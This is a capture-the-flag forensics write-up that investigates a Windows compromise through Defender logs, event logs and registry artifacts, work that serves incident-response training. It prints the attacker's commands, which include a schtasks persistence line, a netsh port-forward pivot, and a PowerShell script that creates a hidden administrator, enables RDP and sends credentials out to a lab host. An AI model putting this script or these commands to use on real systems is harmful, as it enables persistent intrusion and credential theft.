The Enduring Echo#

Question 1#

What was the first (non cd) command executed by the attacker on the host? (string)

A glance at Question 15 tells us that the event logs have the command line detail, filtering for event id 4688 in Security.evtx will give us all process’s command line arguments.

That’s 2137 events and we don’t know when the attacker first moves is. Luckily Window Defender Logs also records potentially malicious commands. Lines with “Engine line reported as lowfi:” in the log will reveal sus commands.

5463
2025-08-24T22:49:14.898 [ESU] ESU heartbeat: ESU disabled (explicit EnableEmergencySigs config)
5464
2025-08-24T22:49:48.429 [RTP] [Mini-filter] OpenWithoutRead notification (2242, 10009, \Device\HarddiskVolume2\Windows\System32\svchost.exe) sent successfully.
5465
Internal signature match:subtype=Lowfi, sigseq=0x0001CBD78CB6CDD5, sigsha=42fd2331d60fbfa863259d427ac5eea278f155fb, cached=false, source=0, resourceid=0xc104a2ee
5466
2025-08-24T22:50:58.804 Engine:command line reported as lowfi: C:\Windows\System32\cmd.exe(cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1756075857.955773 2>&1)
5467
2025-08-24T22:50:58.820 Using signature default action MP_THREAT_ACTION_ALLOW(6) for special threatID: 0x565c7b9a7ffffffe
5468
2025-08-24T22:50:58.836 UnknownTelemetryScan triggered, type: 2 (1 - Unknown, 2- Lofi), flags: 0 (0 - Regular, 1 - MemScan), 1 resources, RtpIoavOnly: FALSE
5469
Internal signature match:subtype=Lowfi, sigseq=0x0001CBD78CB6CDD5, sigsha=42fd2331d60fbfa863259d427ac5eea278f155fb, cached=false, source=0, resourceid=0x9c851786
5470
2025-08-24T22:50:58.914 Engine:command line reported as lowfi: C:\Windows\System32\cmd.exe(cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1756075857.955773 2>&1)
5471
2025-08-24T22:50:58.914 Using signature default action MP_THREAT_ACTION_ALLOW(6) for special threatID: 0x565c7b9a7ffffffe
5472
2025-08-24T22:50:59.195 Using signature default action MP_THREAT_ACTION_ALLOW(6) for special threatID: 0x565c7b9a7ffffffe
5473
2025-08-24T22:50:59.195 Using signature default action MP_THREAT_ACTION_ALLOW(6) for special threatID: 0x565c7b9a7ffffffe

Having seen the attacker’s command pattern, we can filtered for events that contains the string “cmd.exe /Q /c” in its message and left us with only 46 events.

Skips the first few cd commands and we can find the event which answers Quesion 1.

Answer: systeminfo

More about Microsoft Defender Logs could be found at https://www.thedfirspot.com/post/windows-defender-mp-logs-a-story-of-artifacts.

Question 2#

Which parent process (full path) spawned the attacker’s commands? (C:\FOLDER\PATH\FILE.ext)

The above event have this information.

Answer: C:\Windows\System32\wbem\WmiPrvSE.exe

Question 3#

Which remote-execution tool was most likely used for the attack? (filename.ext)

Looks like we gotta do some OSINT, base on the command lines in Defender Logs we can find pages like https://devel.group/blog/peoples-republic-of-china-state-sponsored-cyber-actor-living-off-the-land-to-evade-detection that leads to a tool called wmiexec.py that belongs to Impacket toolkit.

Or you can ask the expert like this:

Answer: wmiexec.py

Question 4#

What was the attacker’s IP address? (IPv4 address)

Since the attack used a remote-execution tool, he should left some Window Logon Type 3 events, more about that event here. For Window logon events. filter for event id 4624 and looks for LogonType of 3.

Answer: 10.129.242.110

You can use this tool to speed up your logs analysis.

Question 5#

What is the first element in the attacker’s sequence of persistence mechanisms? (string)

Diving furthur into Defender Logs we will encounter this line.

6283
2025-08-24T23:03:50.257 Engine:command line reported as lowfi: C:\Windows\System32\cmd.exe(cmd.exe /Q /c schtasks /create /tn SysHelper Update /tr powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Werni\Appdata\Local\JM.ps1 /sc minute /mo 2 /ru SYSTEM /f 1> \\127.0.0.1\ADMIN$\__1756076432.886685 2>&1)

The attacker created a schduled task to maintain persistence named SysHelper Update which will execute JM.ps1 every 2 minutes.

Answer: SysHelper Update

Question 6#

Identify the script executed by the persistence mechanism. (C:\FOLDER\PATH\FILE.ext)

Based on the above command line.

Answer: C:\Users\Werni\Appdata\Local\JM.ps1

Question 7#

What local account did the attacker create? (string)

content of JM.ps1:

1
# List of potential usernames
2
$usernames = @("svc_netupd", "svc_dns", "sys_helper", "WinTelemetry", "UpdaterSvc")
3

4
# Check for existing user
5
$existing = $usernames | Where-Object {
6
    Get-LocalUser -Name $_ -ErrorAction SilentlyContinue
7
}
8

9
# If none exist, create a new one
10
if (-not $existing) {
11
    $newUser = Get-Random -InputObject $usernames
12
    $timestamp = (Get-Date).ToString("yyyyMMddHHmmss")
13
    $password = "Watson_$timestamp"
14

15
    $securePass = ConvertTo-SecureString $password -AsPlainText -Force
16

17
    New-LocalUser -Name $newUser -Password $securePass -FullName "Windows Update Helper" -Description "System-managed service account"
18
    Add-LocalGroupMember -Group "Administrators" -Member $newUser
19
    Add-LocalGroupMember -Group "Remote Desktop Users" -Member $newUser
20

21
    # Enable RDP
22
    Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0
23
    Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
24
    Invoke-WebRequest -Uri "http://NapoleonsBlackPearl.htb/Exchange?data=$([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("$newUser|$password")))" -UseBasicParsing -ErrorAction SilentlyContinue | Out-Null
25
}

The script adds a local account with a random name within $usernames with a time-based password Watson_$timestamp

Filter for event ID 4720 around the same time as the Question 5’s command, we will find the following event.

1
<?xml version="1.0" encoding="utf-16"?>
2
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
3
  <System>
4
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}" />
5
    <EventID>4720</EventID>
6
    <Version>0</Version>
7
    <Level>0</Level>
8
    <Task>13824</Task>
9
    <Opcode>0</Opcode>
10
    <Keywords>0x8020000000000000</Keywords>
11
    <TimeCreated SystemTime="2025-08-24T23:05:09.7646587Z" />
12
    <EventRecordID>4461</EventRecordID>
13
    <Correlation ActivityID="{9f5b5735-1548-0001-a457-5b9f4815dc01}" />
14
    <Execution ProcessID="688" ThreadID="5796" />
15
    <Channel>Security</Channel>
16
    <Computer>Heisen-9-WS-6</Computer>
17
    <Security />
18
  </System>
19
  <EventData>
20
    <Data Name="TargetUserName">svc_netupd</Data>
21
    <Data Name="TargetDomainName">HEISEN-9-WS-6</Data>
22
    <Data Name="TargetSid">S-1-5-21-3871582759-1638593395-315824688-1003</Data>
23
    <Data Name="SubjectUserSid">S-1-5-18</Data>
24
    <Data Name="SubjectUserName">HEISEN-9-WS-6$</Data>
25
    <Data Name="SubjectDomainName">WORKGROUP</Data>
26
    <Data Name="SubjectLogonId">0x3e7</Data>
27
    <Data Name="PrivilegeList">-</Data>
28
    <Data Name="SamAccountName">svc_netupd</Data>
29
    <Data Name="DisplayName">%%1793</Data>
30
    <Data Name="UserPrincipalName">-</Data>
31
    <Data Name="HomeDirectory">%%1793</Data>
32
    <Data Name="HomePath">%%1793</Data>
33
    <Data Name="ScriptPath">%%1793</Data>
34
    <Data Name="ProfilePath">%%1793</Data>
35
    <Data Name="UserWorkstations">%%1793</Data>
36
    <Data Name="PasswordLastSet">%%1794</Data>
37
    <Data Name="AccountExpires">%%1794</Data>
38
    <Data Name="PrimaryGroupId">513</Data>
39
    <Data Name="AllowedToDelegateTo">-</Data>
40
    <Data Name="OldUacValue">0x0</Data>
41
    <Data Name="NewUacValue">0x15</Data>
42
    <Data Name="UserAccountControl">
43

44
    %%2080
45
    %%2082
46
    %%2084
47
    </Data>
48
    <Data Name="UserParameters">%%1793</Data>
49
    <Data Name="SidHistory">-</Data>
50
    <Data Name="LogonHours">%%1797</Data>
51
  </EventData>
52
</Event>

Answer: svc_netupd

Question 8#

What domain name did the attacker use for credential exfiltration? (domain)

Based on JM.ps1, the script exfiltrates to

1
http://NapoleonsBlackPearl.htb/Exchange?data=$([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("$newUser|$password")))

Answer: NapoleonsBlackPearl.htb

Question 9#

What password did the attacker’s script generate for the newly created user? (string)

We know that it is Watson_$timestamp, based on the above event we know user svc_netupd was added on 2025-08-24T23:05:09.7646587Z, so the answer is Watson_20250824230509 right? Well not really because the event logs time is based on the system timezone and $timestamp value is in UTC.

To know what timezone is the system in, we need to inspect HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation registry value, which is at C:\Windows\System32\config\SYSTEM. You can open that registry with Registry Explorer and browse for that key, or alternatively you can use RegRipper:

The system’s timezone is UTC +7.

Answer: Watson_20250824160509

Question 10#

What was the IP address of the internal system the attacker pivoted to? (IPv4 address)

Keep browsing 4688 events around 2025-08-24T23:05:09.7646587Z will lead you to this event.

The attacker ran

1
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress=192.168.1.101 connectport=22

Answer: 192.168.1.101

Question 11#

Which TCP port on the victim was forwarded to enable the pivot? (port 0-65565)

Answer: 9999

Based on the above netsh command.

Question 12#

What is the full registry path that stores persistent IPv4->IPv4 TCP listener-to-target mappings? (HKLM\…\…)

The question asked for a registry path for IPv4 mappings. If you are not familiar with Window Registry, it is a big, structured database where Windows and apps store settings. In this question it is asking specifically about HKEY_LOCAL_MACHINE hive (or HKLM) which stores machine-wide settings (hardware, drivers, services).

HKEY_LOCAL_MACHINE

HKLM hive is devided into 3 on-disk file called SAM, SOFTWARE and SYSTEM and all can be found at C:\Windows\Systemn32\config\:

• SAM: HKLM\SAM\... - stores local user/group info and password hashes.
• SYSTEM: HKLM\SYSTEM\... - system configuration (services, timezone, boot/LSA data used to decrypt SAM, etc.).
• SOFTWARE: HKLM\SOFTWARE\... - installed software and OS configuration.

You can browse to that key with Registry Explorer to see the value:

Answer: HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp

Question 13#

What is the MITRE ATT&CK ID associated with the previous technique used by the attacker to pivot to the internal system? (Txxxx.xxx)

MITRE ATT&CK ID?

MITRE ATT&CK is a public, continually updated knowledge base of how real attackers operate so defenders can detect, stop, and talk about attacks in a common language. It’s organized into tactics and techniques, each with their on ID. Some common IDs

• T1566 - Phishing is a technique in Initial Access tactic.
• T1055 - Process Injection is in Privilege Escalation tactic.
• T1041 - Exfiltration Over C2 Channel is a technique of Exfiltration*.

For the whole framwork, visit the offical website at https://attack.mitre.org

Based on the case, it is implies that internal-proxy setup is of Command and Control tactic and after browwsing the framework we can find this technique’s page:

Alternatively you can do a quick google search like so:

Answer: T1090.001

Visit https://attack.mitre.org for the whole framework.

Question 14#

Before the attack, the administrator configured Windows to capture command line details in the event logs. What command did they run to achieve this? (command)

For powershell history of Administrator, we view this file:

1
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

1
ipconfig
2
powershell New-NetIPAddress -InterfaceAlias "Ethernet0" -IPAddress 172.18.6.3 -PrefixLength 24
3
ipconfig.exe
4
powershell New-NetIPAddress -InterfaceAlias "Ethernet0" -IPAddress 10.129.233.246 -PrefixLength 24
5
ipconfig
6
ncpa.cpl
7
ipconfig
8
ping 1.1.1.1
9
cd C:\Users\
10
ls
11
net user Werni Quantum1! /add
12
ls
13
net localgroup administrator Werni /add
14
net localgroup Administrators Werni /add
15
clear
16
wmic computersystem where name="%COMPUTERNAME%" call rename name="Heisen-9-WS-6"
17
ls
18
cd ..
19
ls
20
cd .\Users\
21
ls
22
net users
23
Rename-Conputer -NewName "Heisen-9-WS-6" -Force
24
Rename-Computer -NewName "Heisen-9-WS-6" -Force
25
net users
26
ls
27
net user felamos /delete
28
cd ..
29
ls
30
net users
31
cat .\Werni\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
32
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
33
Enable-NetFirewallRule -DisplayGroup "Windows Management Instrumentation (WMI)"
34
Enable-NetFirewallRule -DisplayGroup "Remote Event Log Management"
35
Enable-NetFirewallRule -DisplayGroup "Remote Service Management"
36
auditpol /set /subcategory:"Process Creation" /success:enable
37
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
38
Set-MpPreference -DisableRealtimeMonitoring $true
39
Get-MpComputerStatus | Select-Object AMRunningMode, RealTimeProtectionEnabled

Answer: reg add “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit” /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f